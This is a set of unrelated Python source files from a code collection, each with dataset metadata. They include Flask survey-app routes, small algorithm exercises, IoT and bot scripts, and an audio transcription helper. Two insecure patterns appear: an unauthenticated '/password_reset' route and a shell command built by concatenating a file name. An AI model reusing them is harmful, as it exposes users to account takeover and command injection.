else:\n dataSurvey = crear_dataSurvey(id_encuesta)\n return render_template(\"admin/survey.html\", data={\n\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"dataSurvey\": dataSurvey,\n \"textButton\": \"Modificar\"\n }\n )\n elif section == \"respuestas\":\n\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataAnswers\": obtener_respuestas_opcion(id_encuesta)\n }\n )\n elif section == \"usuarios\":\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": 
[\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataUsers\": obtener_encuestados_responden(id_encuesta),\n }\n )\n elif section == \"configuración\":\n\n if db.session.query(Encuesta).filter_by(id_encuesta=id_encuesta).first() == None:\n dataSurvey = {\n \"id\": id_encuesta,\n \"title\": \"\",\n \"description\": \"\",\n \"questions\": []\n }\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataSurvey\": dataSurvey\n }\n )\n\n else:\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataSurvey\": crear_dataSurvey(id_encuesta)\n }\n )\n\n\n# Ruta de respuesta de encuesta\n@app.route(\"/answer_survey//\")\ndef answer_survey(url, id_encuesta):\n\n if (len(url) % 4 != 0 or len(url) == 0):\n return redirect(\"/invalid\")\n\n email = decodificar_mail(url)\n\n # Si no existe mail en la base de datos\n if (db.session.query(Encuestado).filter_by(email=email).first() == None):\n return redirect(\"/invalid\")\n\n encuesta = db.session.query(Encuesta).filter_by(\n id_encuesta=id_encuesta).first()\n\n # Si la encuesta existe\n if encuesta != None:\n\n # Comprobar fecha encuesta y si ya fue respondida por usuario\n if (comprobar_encuestado_encuesta(id_encuesta, email) == True):\n return render_template('403error.html')\n\n # Si la encuesta está activa\n if (encuesta.activa == True):\n\n dataSurvey = crear_dataSurvey(id_encuesta)\n return render_template(\"user/answer_survey.html\", data={\n\n \"selected\": \"answer\",\n \"dataSurvey\": dataSurvey,\n \"encuestado\": email,\n \"type\": comprobar_tipo_encuestado(email),\n \"role\": 'encuestado',\n \"title\": dataSurvey.get('title')\n })\n else:\n return render_template('403error.html')\n else:\n return redirect(\"/invalid\")\n\n# Enviar mails con encuestas\n@app.route(\"/mail_sent\", methods=['POST'])\ndef send_mail():\n if request.method == 'POST':\n response = request.get_json()\n send_mail = Send_Mail()\n responseEmail = send_mail.send_survey(response.get(\"id_survey\"))\n return jsonify(responseEmail)\n\n# Enviar mail de recuperación de contraseña\n@app.route(\"/send_code\",methods=['POST'])\ndef send_code():\n\n if request.method == 'POST':\n response = json.loads(request.form.get(\"response\"))\n\n send_mail = Send_Mail()\n return (send_mail.send_code(response['user_mail'], response['code']))\n\n@app.route(\"/password_reset\",methods=['POST'])\ndef password_reset():\n if request.method == 'POST':\n response = json.loads(request.form.get(\"response\"))\n\n return (cambiar_password(response['user'], response['password']))\n\n\n@app.route(\"/dashboard_admin/\")\n@app.route(\"/dashboard_admin/\")\n@app.route(\"/dashboard_admin//\")\n@login_required\n@admin_required\ndef dashboard_admin(section=\"encuestas\", active=\"false\"):\n\n if section == \"encuestas\":\n return render_template(\"admin/dashboardAdmin.html\", data={\n\n \"url\": \"dashboard_admin\",\n \"options\": [\"Encuestas\", \"Usuarios\"],\n \"selected\": section,\n \"active\": active,\n \"dataSurveys\": obtener_encuestas(),\n \"dataChart\": obtener_cantidad_registrados_e_invitados(),\n \"title\": \"Bienvenido \" 
+ current_user.nombre\n }\n )\n elif section == \"usuarios\":\n return render_template(\"admin/dashboardAdmin.html\", data={\n\n \"url\": \"dashboard_admin\",\n \"options\": [\"Encuestas\", \"Usuarios\"],\n \"selected\": section,\n \"active\": active,\n \"dataUsers\": obtener_usuarios(),\n \"title\": \"Bienvenido \" + current_user.nombre\n }\n )\n\n\n@app.route(\"/aumentar_visita\", methods=['POST'])\ndef aumentar_visita():\n if request.method == 'POST':\n response = json.loads(request.form.get(\"id_survey\"))\n return aumentar_visitas(response)\n\n\n@app.route(\"/dashboard_user/\")\n@login_required\n@registrado_required\ndef dashboard_user():\n return render_template(\"myProfile.html\", data={\n \"url\": \"dashboard_user\",\n \"options\": [],\n \"selected\": \"\",\n \"active\": \"\",\n \"title\": \"Bienvenido \" + current_user.nombre,\n \"role\": 'encuestado',\n \"dataUser\": get_dataUser()\n })\n\n# Desunscribe encuestados\n@app.route(\"/unsubscribe/\")\ndef unsubscribe_mail(url):\n\n if (len(url) % 4 != 0 or len(url) == 0):\n return redirect(\"/invalid\")\n\n email = decodificar_mail(url)\n\n return desunscribir_encuestado(email)\n\n\n@app.route(\"/my_profile\")\n@login_required\ndef my_profile():\n\n return render_template(\"myProfile.html\", data={\n \"url\": \"dashboard_user\",\n \"options\": [],\n \"selected\": \"\",\n \"role\": current_user.rol,\n \"title\": \"Perfil de \" + current_user.nombre,\n \"dataUser\": get_dataUser()\n })\n\n\n@app.route(\"/recover_password\")\ndef recover_password():\n return render_template(\"recover_password.html\")\n\n\n@app.route(\"/change_avatar\", methods=['POST'])\ndef change_avatar():\n if request.method == 'POST':\n response = request.get_json()\n return jsonify(cambiar_avatar(response['user'], response['url']))","repo_name":"mellokx/Proyecto-Semestral-IS2","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":13040,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"21354198566","text":"#!usr/bin/python3\ndef divide(ml):\n pieces = []\n tmp = []\n for index in range(len(ml)):\n tmp.append(ml[index])\n try:\n if ml[index] >= ml[index+1]:\n pieces.append(tmp)\n tmp = []\n except IndexError:\n pieces.append(tmp)\n return pieces\ndef more_elements(ml):\n maxlen = 0\n more = 0\n for index in range(len(ml)):\n if len(ml[index]) > maxlen:\n maxlen = len(ml[index])\n more = ml[index]\n return more\n\ndef main():\n numbers = [12,1,3,4,25,13,17,32]\n llists = divide(numbers)\n score = more_elements(llists)\n print(score)\n\nmain()\n\n","repo_name":"DavoA/2Tasks","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21599750010","text":"from json.encoder import JSONEncoder\n\n\nclass EdgeUpdate(object):\n \"\"\"\n Represents a snapshot of the readings from\n the sensing node.\n \"\"\"\n\n def __init__(self, uuid, timestamp, temp, humidity, dht_temp, dht_humidity):\n self.uuid = uuid\n self.timestamp = timestamp\n self.temp = temp\n self.humidity = humidity\n self.dht_temp = dht_temp\n self.dht_humidity = dht_humidity\n\n def __str__(self) -> str:\n buffer = \"\"\n if self.temp:\n buffer += f\"Soil Temp:{self.temp}°C \"\n if self.dht_temp:\n buffer += f\"Air Temp:{self.dht_temp}°C \"\n if self.dht_humidity:\n buffer += f\"Air Humidity:{self.dht_humidity}%\"\n\n return buffer\n\n\ndef as_edge_update(msg_dict: dict):\n 
update_uuid = msg_dict.get(\"uuid\")\n timestamp = msg_dict.get(\"epoch\")\n temp = msg_dict.get(\"temp\")\n humidity = msg_dict.get(\"humidity\")\n dht_temp = msg_dict.get(\"dhtT\")\n dht_humidity = msg_dict.get(\"dhtH\")\n\n return EdgeUpdate(update_uuid, timestamp, temp, humidity, dht_temp, dht_humidity)\n\n\nclass EdgeUpdateEncoder(JSONEncoder):\n def default(self, update: EdgeUpdate):\n if not isinstance(update, EdgeUpdate):\n return JSONEncoder.default(self, update)\n\n json_obj = {}\n air_json = self.encode_dht(update)\n if air_json:\n json_obj[\"air\"] = air_json\n\n soil_json = self.encode_soil(update)\n if soil_json:\n json_obj[\"soil\"] = soil_json\n\n if not (air_json or soil_json):\n return None\n\n node_json = {}\n node_json[\"data\"] = json_obj\n node_json[\"timestamp\"] = update.timestamp\n node_json[\"uuid\"] = update.uuid\n return node_json\n\n def encode_dht(self, update: EdgeUpdate):\n if not (update.dht_temp or update.dht_humidity):\n return\n\n air = {}\n if update.dht_humidity:\n air[\"humidity\"] = update.dht_humidity\n if update.dht_temp:\n air[\"temp\"] = update.dht_temp\n\n return air\n\n def encode_soil(self, update: EdgeUpdate):\n if not (update.temp or update.humidity):\n return\n\n soil = {}\n if update.humidity:\n soil[\"humidity\"] = update.humidity\n if update.temp:\n soil[\"temp\"] = update.temp\n\n return soil\n","repo_name":"shakram02/plant-watcher-fog","sub_path":"edge/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70634796105","text":"#!/usr/bin/python3\n\"\"\"Gets the total of subscribbers of a subreddit\"\"\"\nfrom requests import get\n\n\ndef number_of_subscribers(subreddit):\n '''\n Takes the subreddit as an argument and returns the count of subscribers\n '''\n base_url = 'https://www.reddit.com/r/'\n headers = {'User-Agent': 'my-app/0.0.1'}\n\n url = f\"{base_url}{subreddit}/about.json\"\n request = get(url, headers=headers, allow_redirects=False)\n\n if request.status_code != 200:\n return 0\n\n try:\n data = request.json()\n except ValueError:\n return 0\n\n data = data.get('data')\n if data:\n sub_count = data.get('subscribers')\n if sub_count:\n return sub_count\n\n return 0\n","repo_name":"Alph-aine/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74319524425","text":"'''\nGiven an integer array B of size N. You need to find the Ath \nlargest element in the subarray [1 to i], where i varies from 1 to N. 
\nIn other words, find the Ath largest element in the sub-arrays \n[1 : 1], [1 : 2], [1 : 3], ...., [1 : N].\n\nNOTE: If any subarray [1 : i] has less than A elements, then the output should be -1 at the ith index.\n'''\n\nfrom heapq import heappop,heappush\nclass Solution:\n # @param A : integer\n # @param B : list of integers\n # @return a list of integers\n def solve(self, A, B):\n\n #create a min heap\n min_heap=[]\n\n #answer array\n answer=[]\n\n #iterate for the A elements\n for index in range(A):\n #push the element in the min heap\n heappush(min_heap,B[index])\n answer.append(-1)\n \n #add answer array\n answer.pop()\n answer.append(min_heap[0])\n\n #iterate for the other values in the index\n for index in range(A,len(B)):\n #get the value at the index\n value=B[index]\n #compare it withe value in min heap\n if value>min_heap[0]:\n #push the minimum element\n heappop(min_heap)\n #add the element\n heappush(min_heap,value)\n #add answer array\n answer.append(min_heap[0])\n \n #return the value\n return answer","repo_name":"SomilKSharma/AdvancedDSA","sub_path":"Heaps/kmax.py","file_name":"kmax.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4850933070","text":"from clover_config.log import Log\nfrom clover_config.efibootmgr import EFIBootManager\nfrom clover_config.config import Config\n\nEFI_ENTRY_LABEL = \"Clover\"\nEFI_ENTRY_LOADER = \"/EFI/CLOVER/CLOVERX64.efi\"\n\ndef install ():\n EFIBootManager.try_remove_boot_entry (EFI_ENTRY_LABEL)\n\n if Config.EFIDefault:\n boot_order = EFIBootManager.get_boot_order ()\n\n EFIBootManager.add_boot_entry (EFI_ENTRY_LABEL, EFI_ENTRY_LOADER)\n\n if Config.EFIDefault:\n bootnum = EFIBootManager.get_bootnum (EFI_ENTRY_LABEL)\n Log.install.info (\"Setting clover as the default EFI boot entry...\")\n if boot_order is None:\n boot_order = bootnum\n else:\n boot_order = \"{},{}\".format (bootnum, boot_order)\n EFIBootManager.set_boot_order (boot_order)\n\ndef remove ():\n EFIBootManager.try_remove_boot_entry (EFI_ENTRY_LABEL)\n\ndef status ():\n bootnum = EFIBootManager.get_bootnum (EFI_ENTRY_LABEL)\n boot_order = EFIBootManager.get_boot_order ().split (\",\")\n active = \"active\" if EFIBootManager.is_active (EFI_ENTRY_LABEL) else \"inactive\"\n if bootnum is None:\n Log.root.info (\"Clover is currently NOT installed in your EFI\")\n else:\n Log.root.info (\"Clover is currently installed at boot position %s and is %s.\", boot_order.index (bootnum), active)\n\ndef update ():\n pass\n\ndef check_efi ():\n EFIBootManager.check_efi ()\n\nActions = {\n \"status\": status,\n \"install\": install,\n \"remove\": remove,\n \"update\": update,\n \"check-efi\": check_efi\n}\n","repo_name":"fin-ger/clover-config","sub_path":"clover_config/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"38791959557","text":"import telegram as tel\nfrom env import TELEGRAM_TOKEN\n\n\nclass TelegramBot:\n def __init__(self, chat_id):\n self.bot = tel.Bot(token=TELEGRAM_TOKEN)\n self.log_queue = []\n self.chat_id = chat_id\n\n def log(self, msg):\n self.log_queue.append(str(msg))\n\n def clear_logs(self):\n self.log_queue = []\n\n def send_logs(self):\n if len(self.log_queue) == 0:\n return\n\n joined_log = \"\\n\".join(self.log_queue)\n if len(joined_log) > 1990:\n full_msg = f\"\"\"{joined_log[:1990]}...\"\"\"\n else:\n full_msg = 
f\"\"\"{joined_log}\"\"\"\n\n self.bot.sendMessage(chat_id=self.chat_id, text=full_msg)\n self.log_queue = []\n\n\nif \"__main__\" == __name__:\n telegram_bot = TelegramBot(chat_id=-1001564791306)\n telegram_bot.log(\"qve to the moon\")\n telegram_bot.send_logs()\n","repo_name":"happysms/kimp_socket","sub_path":"alert/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"12247222396","text":"__time__ = '2021/9/14'\n__author__ = 'ZhiYong Sun'\n\n'''\nsql\n学生表:姓名,学号,班级\n成绩表:学号,学科,得分\n教师表:班级,教师姓名\n查询: 教师所有班级每个学科的平均得分\n\n\nselect 学生表.班级, 成绩表.学科, avg(成绩表.得分)\nFrom 学生表, 成绩表\ngroup by 学生表.班级, 成绩表.学科\nwhere 学生表.学号=成绩表.学号 and 学生表.班级 in (select 班级 where 教师姓名=给定名字 from 教师表)\n\n'''\n","repo_name":"Darius-sss/LeetCode","sub_path":"面试笔试/2022校招笔试面试题/2021-9-14--携程一面.py","file_name":"2021-9-14--携程一面.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74787975944","text":"##\n# Student.py\n# Student class for demo\n#\n# @package\tLearnCode\n# @author\t\tDimas Wicaksono\n# @since\t\t2018-51-25\n##\n\nclass Student:\n\n # constructor\n def __init__(self, name, major, gpa, is_on_probation):\n self.name = name\n self.major = major\n self.gpa = gpa\n self.is_on_probation = is_on_probation\n\n\n def on_honor_roll(self):\n if self.gpa >= 3.50:\n return True\n else:\n return False","repo_name":"diazinmotion/LearnCode","sub_path":"Python/Part I/12. Class & Object/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74492951626","text":"import speech_recognition as sr\nimport pyttsx3 as pyx\nfrom random import choice\nfrom config import *\n\n\nreproducao = pyx.init()\n\n\n#Função para sair o som\ndef sai_som(resposta):\n reproducao.setProperty('voice','brazil+f4')\n reproducao.setProperty('rate',140)\n reproducao.setProperty('volume', 1)\n reproducao.say(resposta)\n reproducao.runAndWait()\n\ndef assistente():\n #Realizando loop da fala e reconhecimento de voz\n print(boas_vindas)\n sai_som(boas_vindas)\n while True:\n resposta_erro_aleatoria = choice(lista_erro)\n recon = sr.Recognizer()\n\n #Abrindo o microfone\n with sr.Microphone() as source:\n \n recon.adjust_for_ambient_noise(source,duration=3)\n \n while True:\n try:\n\n #Ouvindo o usuário\n audio = recon.listen(source)\n user_name = recon.recognize_google(audio,language='pt-br')\n user_name = verificar_nome(user_name)\n name_list()\n apresentacao = \"{}\".format(verificar_nome_exist(user_name))\n print(apresentacao)\n sai_som(apresentacao)\n\n #guardando o nome completo\n brute_user_name = user_name\n user_name = user_name.split(\" \")\n user_name = user_name[0]\n break\n except sr.UnknownValueError:\n sai_som(resposta_erro_aleatoria)\n break\n\n print(\"=\"*len(apresentacao))\n print(\"Ouvindo...\")\n while True:\n \n resposta_erro_aleatoria = choice(lista_erro)\n recon = sr.Recognizer()\n\n #Abrindo o microfone\n with sr.Microphone() as source:\n recon.adjust_for_ambient_noise(source,duration=3)\n \n while True:\n try:\n #Ouvindo o usuário\n audio = recon.listen(source)\n entrada = recon.recognize_google(audio,language='pt-br')\n print(\"{}: {}\".format(user_name,entrada))\n \n resposta = tipo_funcao(entrada)\n\n print('Assistente: {}'.format(resposta))\n sai_som(resposta)\n\n except 
sr.UnknownValueError:\n sai_som(resposta_erro_aleatoria)\n\nif __name__=='__main__':\n intro()\n sai_som(\"Iniciando...\")\n assistente()","repo_name":"Gabr1el94/Python","sub_path":"automacao-bot/assistente-virtual/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35004722007","text":"# importing libraries \nimport speech_recognition as sr; import os; from pydub import AudioSegment \nimport io; from scipy.io.wavfile import write; import numpy as np\n#from pydub.silence import split_on_silence \nfrom pydub.utils import make_chunks; import re; from google.cloud import storage\n\ndef length(fname): #finding the length of audio file\n\tstorage_client = storage.Client()\n\tbucket = storage_client.get_bucket('awesome-bucketness')\n\tbb = bucket.get_blob(fname) #Retrieve blob after uploading to GCS\n\tbblength = bb.download_as_string()\n\taudio = AudioSegment.from_file(io.BytesIO(bblength), format=re.split('\\.', fname)[1]) #also good with wav, m4a, ogg\n\tif audio is None: #var = os.system(\"ffmpeg -i /Users/catherineng/Downloads/0aeaedfc-b0ee-4ad1-a6b7-85ed8e588400.ogg -loglevel quiet -stats -f null - 2>&1 | awk '{print $2}' | sed s/://g | sed s/[a-z]//g | sed s/=//g\")\n\t\tvar = system(\"ffmpeg -i \" + fname + \" -loglevel quiet -stats -f null - 2>&1 | awk '{print $2}' | sed s/://g | sed s/[a-z]//g | sed s/=//g\")\n\t\treturn var\n\telse: \n\t\treturn audio.duration_seconds #return audio.info.length\n\t\ndef transcribe_audio(f, name, lang):\n\tsong = AudioSegment.from_file(io.BytesIO(f), re.split('\\.', name)[1])\n\taudio_chunk = np.array(song.get_array_of_samples()) #convert it to array.array\n\taudio_chunk = audio_chunk.reshape(song.channels, -1, order='F').T\n\toutput = io.BytesIO(); rate = song.frame_rate\n\twrite(output, rate, audio_chunk)\n\tr = sr.Recognizer()\n\twith sr.AudioFile(output) as source:\n\t\taudio = r.record(source)\n\ttranscription = r.recognize_google(audio, language=lang) #class 'str'\n\treturn transcription\n\n# a function that splits the audio file into chunks and applies speech recognition \ndef silence_based_conversion(path, name, lang): \t\n\t# open the audio file stored in the local system as a wav file. \n\tsong = AudioSegment.from_file(io.BytesIO(path), format=re.split('\\.', name)[1])\n\t# move into the directory to store the audio files. #os.chdir('audio_chunks')\n\tchunks = make_chunks(song, 30000)\n\ttranscription = \"\"\n\t# process each chunk \n\tfor i, chunk in enumerate(chunks): \n\t\t\t\t\n\t\t# Create 0.5 (10/10000) seconds silence chunk \n\t\tchunk_silent = AudioSegment.silent(duration = 10) \n\t\n\t\t# add 0.5 sec silence to beginning and end of audio chunk. This is done so that it doesn't seem abruptly sliced. 
\n\t\taudio_chunk = chunk_silent + chunk + chunk_silent \n\t\taudio_chunk = audio_chunk.get_array_of_samples() #convert it to array.array\n\t\taudio_chunk= np.array(audio_chunk) #convert it to numpy.ndarray\n\t\t#print(audio_chunk.shape) #(5293748,)\n\t\taudio_chunk = audio_chunk.reshape(song.channels, -1, order='F').T #reshape to (num of samples, num of channels)\n\t\t#print(audio_chunk.shape) #(2, 2646874) --> (2646874, 2)\n\t\t#specify the bitrate to be 192 kbps #audio_chunk.export(\"./chunk\" + str(i) + \".wav\", format =\"wav\") \n\t\toutput = io.BytesIO()\n\t\t#audio_chunk.export(output, formsong.dtyat=\"wav\")\n\t\trate = song.frame_rate\n\t\twrite(output, rate, audio_chunk)\n\t\n\t\t# create a speech recognition object \n\t\tr = sr.Recognizer() \n\t\n\t\t# recognize the chunk \n\t\twith sr.AudioFile(output) as source: \n\t\t\t# remove this if it is not working correctly. \n\t\t\t#r.adjust_for_ambient_noise(source, duration=5) \n\t\t\t#audio_listened = r.listen(source) \n\t\t\taudio = r.record(source) \n\t\ttry: \n\t\t\t#try converting it to text \n\t\t\trec = r.recognize_google(audio, language=lang) #write the output to the file. #fh.write(rec+\". \") \n\t\t# catch any errors. \n\t\texcept sr.UnknownValueError: \n\t\t\treturn \"Could not understand audio\"\n\t\n\t\texcept sr.RequestError as e: \n\t\t\treturn \"Could not request results. check your internet connection\"\n\n\t\ttranscription += rec + \" \"\n\treturn transcription \n\t\n\t#os.chdir('..') \n\t\nif __name__ == '__main__': \n\tprint('Enter the audio file path') \n\tpath = input() \n\tsilence_based_conversion(path, 'en-US') \n","repo_name":"catherine8224/Transcribe_Audio","sub_path":"longaudio.py","file_name":"longaudio.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70335094024","text":"import paho.mqtt.client as mqtt\nimport os\nimport threading\nimport logging\nimport time\nimport unicornhathd as unicorn\n\nclass SharedContext:\n current_color = \"off\"\n\nshared_context = SharedContext()\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n client.subscribe(\"/pistatus/light/color\")\n\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n shared_context.current_color = str(msg.payload.decode(\"utf-8\"))\n\n\ndef set_color(r,g,b):\n width,height=unicorn.get_shape()\n for y in range(height):\n for x in range(width):\n unicorn.set_pixel(x,y,r,g,b)\n unicorn.show()\n\ndef do_light_thing(context):\n unicorn.set_layout(unicorn.AUTO)\n unicorn.rotation(0)\n unicorn.brightness(.40)\n width,height=unicorn.get_shape()\n\n while True:\n if context.current_color == \"green\" :\n set_color(0,255,0)\n elif context.current_color == \"red\" :\n set_color(255,0,0)\n elif context.current_color == \"blue\" :\n set_color(0,0,255)\n elif context.current_color == \"yellow\" :\n set_color(255,255,0)\n else:\n unicorn.clear()\n unicorn.show()\n time.sleep(0.05)\n\nif __name__ == \"__main__\":\n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n\n light_thread = threading.Thread(target=do_light_thing, args=(shared_context,))\n light_thread.daemon = True\n light_thread.start()\n\n mqtthost = os.environ.get(\"MQTT_HOST\")\n if mqtthost == None:\n raise Exception(\"Missing Environment Setting\",\"MQTT_HOST\")\n\n client.connect(mqtthost,1883,60)\n\n 
client.loop_forever()\n\n","repo_name":"CaseyMacPherson/UnicornPiStatus","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40839684311","text":"\"\"\"\nInvoke deployed endpoint\n\"\"\"\nimport sagemaker\nfrom sagemaker.predictor import csv_serializer, RealTimePredictor\nfrom sagemaker.content_types import CONTENT_TYPE_CSV, CONTENT_TYPE_JSON\n\nfrom ...sm_utils import parse_invoke_args\n\nif __name__ == \"__main__\":\n args = parse_invoke_args()\n ep_name = args.end_point\n sm_sess = sagemaker.Session()\n\n if (args.delete_ep):\n print(f'Deleting EndPoint {ep_name}')\n sm_client = sm_sess.boto_session.client('sagemaker')\n sm_client.delete_endpoint(EndpointName=ep_name)\n else:\n print(f'Invoking EndPoint {ep_name}')\n payload = 'M, 0.44, 0.365, 0.125, 0.516, 0.2155, 0.114, 0.155'\n actual_rings = 10\n\n predictor = RealTimePredictor(\n endpoint=ep_name,\n sagemaker_session=sm_sess,\n serializer=csv_serializer,\n content_type=CONTENT_TYPE_CSV,\n accept=CONTENT_TYPE_JSON\n )\n\n print(predictor.predict(payload))","repo_name":"chenwuperth/smworkshop","sub_path":"examples/07/inference/invoke_endpoint.py","file_name":"invoke_endpoint.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23237537680","text":"from rouge import Rouge \nimport argparse\nrouge = Rouge(['rouge-1'])\nimport string\nfrom tqdm import tqdm\n\ndef read_text(filename):\n with open(filename, 'r') as f:\n data = f.readlines()\n return data\n\ndef write_text(data, filename):\n with open(filename, 'w') as fout:\n for line in data:\n fout.write(line+'\\n')\n\ndef extract_content(text):\n cells = []\n text = text.replace('', '').replace('', '')\n for cell in text.split(''):\n if cell.strip() in ['', '[TABLECONTEXT]', '[title]']:\n continue \n if cell.strip() not in cells:\n cells.append(cell.strip())\n return ' '.join(cells)\n\ndef get_char_seq(sent):\n return ''.join([c for c in sent if c != ' ' and c not in string.punctuation and c.isascii()])\n\ndef recover_original_strings(outputs, inputs):\n new_outputs = []\n for i in range(len(inputs)):\n inputs[i] = inputs[i].replace('', '').replace('', '')\n cells = []\n for cell in inputs[i].split(''):\n if cell.strip() in ['', '[TABLECONTEXT]', '[title]']:\n continue \n if cell.strip() not in cells:\n cells.append(cell.strip().lower())\n sent = outputs[i]\n char_seq = [(c, i) for i, c in enumerate(sent) if c != ' ' and c not in string.punctuation and c.isascii()]\n chars = ''.join([c[0] for c in char_seq])\n indices = [c[1] for c in char_seq]\n\n replace_pairs = []\n for word in cells:\n if any([c in string.punctuation for c in word]) or not word.isascii():\n m_word = ''.join([c for c in word if c not in string.punctuation and c!= ' ' and c.isascii()])\n if len(m_word) == 0:\n continue\n occurs = chars.find(m_word)\n if occurs >= 0:\n target_start = indices[occurs]\n if occurs+len(m_word) < len(indices):\n target_end = indices[occurs+len(m_word)]\n else:\n target_end = len(sent)\n end_fail = False # Here, some punctuation in the end may also be removed, we bring them back\n while sent[target_end-1] != word[-1]:\n target_end -= 1\n if (sent[target_end-1] != ' ' and sent[target_end-1] not in string.punctuation and sent[target_end-1].isascii()):\n break\n if sent[target_end-1] != word[-1]:\n end_fail = True\n if end_fail:\n continue\n 
start_fail = False # Here we try to include punctuations that may appear in the begining\n while sent[target_start] != word[0]:\n target_start -= 1\n if (sent[target_start] not in string.punctuation and sent[target_start] != ' ' and sent[target_start].isascii()) or target_start <= 0:\n break\n if sent[target_start] != word[0]:\n start_fail = True\n if start_fail:\n continue\n target = sent[target_start:target_end]\n if len(get_char_seq(target)) != len(get_char_seq(word)):\n continue\n if target != word and (target, word) not in replace_pairs:\n if target_end < len(sent) and sent[target_end] != ' ':\n target += ' '\n word += ' '\n if target_start > 0:\n target = ' ' + target\n word = ' ' + word\n replace_pairs.append((target, word))\n for p in replace_pairs:\n sent = sent.replace(p[0], p[1])\n new_outputs.append(sent)\n return new_outputs\n\ndef process_one_file(output_filename, input_filename):\n sentences = read_text(output_filename)\n all_inputs = read_text(input_filename)\n selected_sentences = []\n emptytop1 = 0\n emptyin = 0\n for i in tqdm(range(len(sentences))):\n beams = sentences[i].split('|||')\n inputs = extract_content(all_inputs[i])\n beams[-1] = beams[-1].strip()\n if beams[0] == '':\n emptytop1 += 1\n if '' in beams:\n emptyin += 1\n try:\n scores_get = [(rouge.get_scores(s.lower(), inputs.lower()), b) for b, s in enumerate(beams)]\n scores_get.sort(key=lambda x: x[0][0]['rouge-1']['f'], reverse=True)\n sent = beams[scores_get[0][1]]\n except:\n print (inputs)\n sent = ''\n for beam in beams:\n if beam != '':\n sent = beam \n break\n recover_sent = recover_original_strings([sent], [all_inputs[i]])[0]\n selected_sentences.append(recover_sent)\n return selected_sentences\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--verbalizer_outputs\", default=None, type=str, required=False) \n parser.add_argument(\"--verbalizer_inputs\", default=None, type=str, required=False) \n args = parser.parse_args()\n selected_sentences = process_one_file(args.verbalizer_outputs, args.verbalizer_inputs)\n write_text(selected_sentences, args.verbalizer_outputs.replace('.txt', 'beam_selection.txt'))","repo_name":"Mayer123/UDT-QA","sub_path":"Verbalizer/post_processing.py","file_name":"post_processing.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"81"} +{"seq_id":"72807796745","text":"import sys\nsys.setrecursionlimit(100000)\n\ndef getShortest(graph, start, end) :\n '''\n graph가 주어질 때, start부터 end까지의 최단거리를 반환하는 함수를 작성하세요.\n '''\n # 정점의 개수\n V = len(graph)\n\n # 각 정점의 거리\n dist = [float('inf') for i in range(V)]\n # 방문했는지 확인\n visited = [False for i in range(V)]\n\n dist[start] = 0\n\n while True:\n mini = float('inf')\n node = -1\n for j in range(V):\n if visited[j] == False and dist[j] < mini:\n mini = dist[j]\n node = j\n if mini == float('inf'):\n break\n visited[node] = True\n\n for j in range(len(graph[node])):\n des = graph[node][j][0]\n cost = graph[node][j][1]\n\n if dist[des] > dist[node] + cost:\n dist[des] = dist[node] + cost\n return dist[end]\n\n\n\n\n\n return graph\n\ndef main():\n vertexs, edges, start, end = 